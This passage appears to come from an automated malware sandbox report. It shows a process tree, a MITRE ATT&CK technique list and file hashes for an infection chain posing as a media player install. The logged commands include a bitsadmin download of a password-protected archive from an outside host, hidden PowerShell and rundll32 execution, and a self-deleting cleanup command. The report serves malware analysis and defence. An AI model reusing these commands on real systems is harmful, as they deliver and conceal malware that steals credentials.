                                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                      7⤵
                                                                      • Download via BitsAdmin
                                                                      PID:8168
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p9UiKUpbRlSaJBYc -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Drops file in Program Files directory
                                                                      PID:2904
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:8124
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:7968
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:7880
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                          7⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:2940
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:2580
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:2788
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NCZgYfKnLJ\NCZgYfKnLJ.dll" NCZgYfKnLJ
                                                                              7⤵
                                                                                PID:2944
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NCZgYfKnLJ\NCZgYfKnLJ.dll" NCZgYfKnLJ
                                                                                  8⤵
                                                                                  • Drops file in System32 directory
                                                                                  PID:8120
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:2224
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:2356
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:2412
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:1056
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst14BB.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                        • Drops file in Program Files directory
                                                                                        PID:924
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:7776
                                                                          • C:\Windows\system32\conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe "-1178596170-20608275631044608647933241575-1964998945-19423620082052575960-1936225430"
                                                                            1⤵
                                                                            • Loads dropped DLL
                                                                            • Modifies registry class
                                                                            PID:2724
                                                                          • C:\Users\Admin\AppData\Local\Temp\21A4.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\21A4.exe
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:2400
                                                                          • C:\Users\Admin\AppData\Local\Temp\2E81.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\2E81.exe
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:7864
                                                                          • C:\Users\Admin\AppData\Local\Temp\4E8F.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\4E8F.exe
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:7904
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                              2⤵
                                                                                PID:2796
                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                  timeout 1
                                                                                  3⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:1664
                                                                              • C:\Users\Admin\AppData\Local\Temp\4E8F.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\4E8F.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:8148
                                                                              • C:\Users\Admin\AppData\Local\Temp\4E8F.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\4E8F.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Checks processor information in registry
                                                                                • Modifies system certificate store
                                                                                PID:7824
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 4E8F.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4E8F.exe" & del C:\ProgramData\*.dll & exit
                                                                                  3⤵
                                                                                    PID:1020
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /im 4E8F.exe /f
                                                                                      4⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:2396
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      timeout /t 6
                                                                                      4⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:8160
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 7904 -s 948
                                                                                  2⤵
                                                                                  • Program crash
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  PID:7972
                                                                              • C:\Users\Admin\AppData\Local\Temp\5747.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\5747.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:3032
                                                                                • C:\Users\Admin\AppData\Local\Temp\5747.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\5747.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:8184
                                                                              • C:\Users\Admin\AppData\Local\Temp\5D7F.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\5D7F.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                PID:2592
                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                1⤵
                                                                                  PID:2292
                                                                                • C:\Windows\explorer.exe
                                                                                  C:\Windows\explorer.exe
                                                                                  1⤵
                                                                                    PID:816
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:900
                                                                                  • C:\Windows\explorer.exe
                                                                                    C:\Windows\explorer.exe
                                                                                    1⤵
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:2980
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:2744
                                                                                  • C:\Windows\explorer.exe
                                                                                    C:\Windows\explorer.exe
                                                                                    1⤵
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:1348
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:2420
                                                                                  • C:\Windows\explorer.exe
                                                                                    C:\Windows\explorer.exe
                                                                                    1⤵
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:7984
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                      PID:7876

                                                                                    Network

                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                    Execution

                                                                                    Scheduled Task

                                                                                    1
                                                                                    T1053

                                                                                    Persistence

                                                                                    Registry Run Keys / Startup Folder

                                                                                    1
                                                                                    T1060

                                                                                    Scheduled Task

                                                                                    1
                                                                                    T1053

                                                                                    BITS Jobs

                                                                                    1
                                                                                    T1197

                                                                                    Privilege Escalation

                                                                                    Scheduled Task

                                                                                    1
                                                                                    T1053

                                                                                    Defense Evasion

                                                                                    Modify Registry

                                                                                    3
                                                                                    T1112

                                                                                    BITS Jobs

                                                                                    1
                                                                                    T1197

                                                                                    Install Root Certificate

                                                                                    1
                                                                                    T1130

                                                                                    Credential Access

                                                                                    Credentials in Files

                                                                                    5
                                                                                    T1081

                                                                                    Discovery

                                                                                    Software Discovery

                                                                                    1
                                                                                    T1518

                                                                                    Security Software Discovery

                                                                                    1
                                                                                    T1063

                                                                                    Query Registry

                                                                                    4
                                                                                    T1012

                                                                                    Peripheral Device Discovery

                                                                                    2
                                                                                    T1120

                                                                                    System Information Discovery

                                                                                    4
                                                                                    T1082

                                                                                    Remote System Discovery

                                                                                    1
                                                                                    T1018

                                                                                    Collection

                                                                                    Data from Local System

                                                                                    5
                                                                                    T1005

                                                                                    Command and Control

                                                                                    Web Service

                                                                                    1
                                                                                    T1102

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads

                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                      MD5

                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                      SHA1

                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                      SHA256

                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                      SHA512

                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                      MD5

                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                      SHA1

                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                      SHA256

                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                      SHA512

                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                    • C:\Program Files\Java\DCHOZCJYNE\ultramediaburner.exe
                                                                                      MD5

                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                      SHA1

                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                      SHA256

                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                      SHA512

                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                    • C:\Program Files\Java\DCHOZCJYNE\ultramediaburner.exe
                                                                                      MD5

                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                      SHA1

                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                      SHA256

                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                      SHA512

                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                      MD5

                                                                                      21ec89966012581b223f37dfcb95439a

                                                                                      SHA1

                                                                                      8c25eaae58a7ac90ad37ad6c9f341f94e1089ed3

                                                                                      SHA256

                                                                                      1765b0a85d23a048d83b9952c834498808fc59444eb4d6ef07a80109ae5b8f7c

                                                                                      SHA512

                                                                                      349273db8f045a414fb747ebd634179e48c3b22117fc5deb66a8c805f3620b8e7c3682e700a975482d683f3c8f945099c6408e3ae46fd41132727bc8143bd319

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                                                      MD5

                                                                                      15775d95513782f99cdfb17e65dfceb1

                                                                                      SHA1

                                                                                      6c11f8bee799b093f9ff4841e31041b081b23388

                                                                                      SHA256

                                                                                      477a9559194edf48848fce59e05105168745a46bdc0871ea742a2588ca9fbe00

                                                                                      SHA512

                                                                                      ac09ce01122d7a837bd70277badd58ff71d8c5335f8fc599d5e3ed42c8fee2108dd043bce562c82ba12a81b9b08bd24b961c0961bf8fd3a0b8341c87483cd1e7

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                      MD5

                                                                                      738f87d95d3387db176a831bd856d41a

                                                                                      SHA1

                                                                                      6c93f69de565349d8674fa25ac93906209478a8e

                                                                                      SHA256

                                                                                      5353cc718ad3df331ec39394a3e2b161eb273f5d915371dfb388a913f2f2d979

                                                                                      SHA512

                                                                                      b4492e41ed2cb21912da1761d0827898c2ae9f541f82f5911c3d9c1d99127f6289a6956ae8f0f9f86ce34be97958d0c749017182d2971800e39c5a347185e196

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                      MD5

                                                                                      b66ed17dd6ac4f714921e65a21ae614c

                                                                                      SHA1

                                                                                      29351634bb19b5f8e70c329ec939ca1fa6c2847c

                                                                                      SHA256

                                                                                      a4eae86c62372efaff4c5b460f79478aba45553ebf8d914150274ad605af268c

                                                                                      SHA512

                                                                                      b862535667c97c9f44a4e1c67606c223d7144f9ded3584e697d96e0ee79ce7b3e6f0788e2254fa478c0cf67eada222c52398920d7ea683f7d0bb6338263e8148

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                      MD5

                                                                                      a7803cd0ef30f0315ef4779f2f312119

                                                                                      SHA1

                                                                                      eb6bbfb5cbc31d4e25e817aebf8cb6150a615bd8

                                                                                      SHA256

                                                                                      79d94b68c76683929c88a383b0a832d9a724301c0cc9445ae482a7ac43746740

                                                                                      SHA512

                                                                                      8ed2e93d8212fe1c6bbda8dacd1d1ec3eb41e005fa628ad247fdf88d75ca96e74c608b075ea2ce9a692ca6693135dead47a04f33cb082f8c900949d2f52ccb93

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                      MD5

                                                                                      7dbafdc5ab0140e683740d1d2a278b4c

                                                                                      SHA1

                                                                                      e83a9b55a0bfa98febb49a105d1aae2d303939e3

                                                                                      SHA256

                                                                                      18ac57b415cb5cdc9c9df82430e4105c92c4e56d94dcb57dadc1f3d39ac75436

                                                                                      SHA512

                                                                                      a6ea2adefcb5c5716a1a9df0fb03ff39f4f413534dd53af2a3a5abe1dd349fc9e71167774dbf86c3083e6567db180fdef4a6685ee836acd853ef630663316640

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                      MD5

                                                                                      faf288fb28665cee83a31919bc9bca53

                                                                                      SHA1

                                                                                      8b4a163dd0523d0d997d30a405c6b932fcec7ebb

                                                                                      SHA256

                                                                                      e87785887e8f271480e4cff8915cf7811b9ac18e1ed22e42807cf222e93436d4

                                                                                      SHA512

                                                                                      5f332dcde725523ea516d566c573045929dfbd9a96a37973c5f8e968fa92cafe3e215affa319d2091d0463158a5534a4bb39854c1bb115d80cbe8e422516d56a

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                      MD5

                                                                                      21cb858d7c49db4314a0849dcd2ce760

                                                                                      SHA1

                                                                                      d73211be138d9bfd400fdda53237ec91cd6343e2

                                                                                      SHA256

                                                                                      eacca56e66205826e7307ba82a337f5b53d4f3daa33e3b2acfd20d70dd31b7cd

                                                                                      SHA512

                                                                                      b44ad369e2e9f069b39c84512c17c1c98d9df7aa876879c1ae477428b042a62eab587f173bd57f25884f88baddb70a80fd0ed44d9031e89615dbfd0f52dabecc

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                      MD5

                                                                                      458dd12f5b5bde653d140ad62ec08e66

                                                                                      SHA1

                                                                                      493f4715ab10df9764d5f89055927624a05a50b5

                                                                                      SHA256

                                                                                      795643b6f20b7554194f521aa8ede0f7994b4bb98c290a9a6af94bbec3f15f08

                                                                                      SHA512

                                                                                      fb28cce0f2d1603c088ea8a4c5bcec7d00497c4c11d47f42f9f12b19de95a77e39e07f0c70d2549178582546da0e0afe1632b0e2c14e12443fed857fe8876298

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                      MD5

                                                                                      313f505b9b5c48c029f7a11f8c52443e

                                                                                      SHA1

                                                                                      5c4a3a35d0228a2da254fa325e053ba4e5168aa9

                                                                                      SHA256

                                                                                      e26a04d0932848d56df65cb5e4c54d83091a84eec6b858141f73177e6078eb08

                                                                                      SHA512

                                                                                      af9882ff59576557f06d2b4a53e90038ddbd4d3d9c4503cad57b5c21b1145af2ee0504cc5f73275b08f7f5019ff98777df10ccaf1b8add1819545a389f7aeceb

                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                      MD5

                                                                                      860a3bba65db8d2b86ec4f46a80d83d5

                                                                                      SHA1

                                                                                      cd1ceab9b3ddcc4498b8c6e8607605069886f51b

                                                                                      SHA256

                                                                                      98ede79cbc56916d37a8acccb40a1c4065964bd2e6990d0fad435bfad6f5d481

                                                                                      SHA512

                                                                                      f2ddd70dc7859d6c05c15106b4a25fa3484b5f52ec240e940c65ae9cb7f6029b2e7b13acaf1bda19a5a61c3eab10a98014bdc515d7716d2b160d2e47bf40cdc7

                                                                                    • C:\Users\Admin\AppData\Local\AdvinstAnalytics\6073fee5118372253d99d22b\1.0.0\tracking.ini
                                                                                      MD5

                                                                                      462530243dc8f2165d7c6a8adc474ad6

                                                                                      SHA1

                                                                                      60d7ad0abaef4cb53a68dfc9b911e15e574dff40

                                                                                      SHA256

                                                                                      60c8a9e86a511afd54bbf49a6a3784a271a853743fd25d40ea0641bced01f7ad

                                                                                      SHA512

                                                                                      ac66329c4b66ab0be987133b1c5171097776446fa59bbeab29bf67c0ad1e9795422a84a5b0821f2b9891beb40679d8c0f53359362647aea1b68b982a6d5d5186

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L1Y3K90W\UWLMPH81.htm
                                                                                      MD5

                                                                                      6f1b262bad8160c54c6bddd5c1abd7c6

                                                                                      SHA1

                                                                                      2e401bf08ca87f51ac3125f9f3b5d8d87a78b1b7

                                                                                      SHA256

                                                                                      f3b28ac03e9d0de23cbeecd03835b7397f01fab14f329028d8c8eb2b97d34ec3

                                                                                      SHA512

                                                                                      eea41d9214c882bc40c16cc72e4ed8cecc36857fa4d22bb61c1f7477d6a8f29ca636539646334adae8805e66309fad65c9bc6632f133311cb43bdecbe67033d5

                                                                                    • C:\Users\Admin\AppData\Local\Temp\MSI97AD.tmp
                                                                                      MD5

                                                                                      d07ddd437009ebb9c21882579bf2df0d

                                                                                      SHA1

                                                                                      a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                      SHA256

                                                                                      c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                      SHA512

                                                                                      8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                    • C:\Users\Admin\AppData\Local\Temp\MSI9C40.tmp
                                                                                      MD5

                                                                                      5a25fb13ed470b77eefd2eb89cb62c47

                                                                                      SHA1

                                                                                      3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

                                                                                      SHA256

                                                                                      0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

                                                                                      SHA512

                                                                                      2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

                                                                                    • C:\Users\Admin\AppData\Local\Temp\d0-26286-b52-c6d9b-f4c9ea63b8cb0\Fijisafaqo.exe
                                                                                      MD5

                                                                                      c0cf9a2aa73be476329a8ffd03c17b19

                                                                                      SHA1

                                                                                      c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                      SHA256

                                                                                      f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                      SHA512

                                                                                      32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                    • C:\Users\Admin\AppData\Local\Temp\d0-26286-b52-c6d9b-f4c9ea63b8cb0\Fijisafaqo.exe
                                                                                      MD5

                                                                                      c0cf9a2aa73be476329a8ffd03c17b19

                                                                                      SHA1

                                                                                      c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                      SHA256

                                                                                      f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                      SHA512

                                                                                      32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                    • C:\Users\Admin\AppData\Local\Temp\d0-26286-b52-c6d9b-f4c9ea63b8cb0\Fijisafaqo.exe.config
                                                                                      MD5

                                                                                      98d2687aec923f98c37f7cda8de0eb19

                                                                                      SHA1

                                                                                      f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                      SHA256

                                                                                      8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                      SHA512

                                                                                      95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                    • C:\Users\Admin\AppData\Local\Temp\da-15810-a79-529bc-112fb4a6598c7\Kenessey.txt
                                                                                      MD5

                                                                                      97384261b8bbf966df16e5ad509922db

                                                                                      SHA1

                                                                                      2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                      SHA256

                                                                                      9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                      SHA512

                                                                                      b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                    • C:\Users\Admin\AppData\Local\Temp\da-15810-a79-529bc-112fb4a6598c7\ZHikucykumae.exe
                                                                                      MD5

                                                                                      1f19330a59c0369f5d0b77b02f275568

                                                                                      SHA1

                                                                                      0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                      SHA256

                                                                                      f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                      SHA512

                                                                                      3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                    • C:\Users\Admin\AppData\Local\Temp\da-15810-a79-529bc-112fb4a6598c7\ZHikucykumae.exe
                                                                                      MD5

                                                                                      1f19330a59c0369f5d0b77b02f275568

                                                                                      SHA1

                                                                                      0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                      SHA256

                                                                                      f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                      SHA512

                                                                                      3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                    • C:\Users\Admin\AppData\Local\Temp\da-15810-a79-529bc-112fb4a6598c7\ZHikucykumae.exe.config
                                                                                      MD5

                                                                                      98d2687aec923f98c37f7cda8de0eb19

                                                                                      SHA1

                                                                                      f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                      SHA256

                                                                                      8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                      SHA512

                                                                                      95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-3C092.tmp\Ultra.exe
                                                                                      MD5

                                                                                      cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                      SHA1

                                                                                      ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                      SHA256

                                                                                      0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                      SHA512

                                                                                      49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-3C092.tmp\Ultra.exe
                                                                                      MD5

                                                                                      cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                      SHA1

                                                                                      ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                      SHA256

                                                                                      0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                      SHA512

                                                                                      49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-J94KO.tmp\Install2.tmp
                                                                                      MD5

                                                                                      45ca138d0bb665df6e4bef2add68c7bf

                                                                                      SHA1

                                                                                      12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                                      SHA256

                                                                                      3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                                      SHA512

                                                                                      cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-P6RS1.tmp\ultramediaburner.tmp
                                                                                      MD5

                                                                                      4e8c7308803ce36c8c2c6759a504c908

                                                                                      SHA1

                                                                                      a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                      SHA256

                                                                                      90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                      SHA512

                                                                                      780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-P6RS1.tmp\ultramediaburner.tmp
                                                                                      MD5

                                                                                      4e8c7308803ce36c8c2c6759a504c908

                                                                                      SHA1

                                                                                      a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                      SHA256

                                                                                      90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                      SHA512

